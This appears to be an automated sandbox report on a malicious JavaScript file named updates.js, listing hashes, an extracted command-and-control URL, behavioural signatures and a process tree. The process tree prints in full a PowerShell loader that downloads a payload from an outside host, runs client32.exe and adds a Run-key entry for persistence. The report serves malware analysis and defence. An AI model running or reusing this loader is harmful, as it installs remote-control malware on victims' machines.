Analysis
-
max time kernel
2s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
06/06/2024, 03:17
Static task
static1
Behavioral task
behavioral1
Sample
updates.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
updates.js
Resource
win10v2004-20240226-en
General
-
Target
updates.js
-
Size
7.3MB
-
MD5
cbb64c3f4095d8fc567c2e3fc1295a67
-
SHA1
a114622094d9563593cd3e571ffb2d7f67edd8c9
-
SHA256
db302ab8343193ac2826bd9de5b168af740c6e6e6779149daec44efc0ac01b95
-
SHA512
eda9bf2299253b5026a38f43bb5e5eaf1169332e9a3afb699928c059713952f2604c442476f31e5f98a8f67073948e0e0697591ade88c2999ff0b0c3d0e35fd9
-
SSDEEP
49152:e7h4zjCxb7qHlp4XONN0G7h20kQmwYzYMm7u+8wgJ3wr/xN1GIWx3qpWROg2cE08:7
Malware Config
Extracted
http://lilygovert91.top/data.php?10425
http://lilygovert91.top/data.php?10425
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 940 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2188 wrote to memory of 940 2188 wscript.exe 28 PID 2188 wrote to memory of 940 2188 wscript.exe 28 PID 2188 wrote to memory of 940 2188 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\updates.js1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VLMBEFDHFEB='http://lilygovert91.top/data.php?10425';$GRGOAC=(New-Object System.Net.WebClient).DownloadString($VLMBEFDHFEB);$YPUNIGTS=[System.Convert]::FromBase64String($GRGOAC);$asd = Get-Random -Minimum -10 -Maximum 37; $ARHZXFUYD=[System.Environment]::GetFolderPath('ApplicationData')+'\ZVMSLKLAUN'+$asd;if (!(Test-Path $ARHZXFUYD -PathType Container)) { New-Item -Path $ARHZXFUYD -ItemType Directory };$p=Join-Path $ARHZXFUYD 'wah.zip';[System.IO.File]::WriteAllBytes($p,$YPUNIGTS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ARHZXFUYD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ARHZXFUYD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ARHZXFUYD -Force; $fd.attributes='Hidden';$s=$ARHZXFUYD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='SZDFRX';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Command and Scripting Interpreter: PowerShell
PID:940
-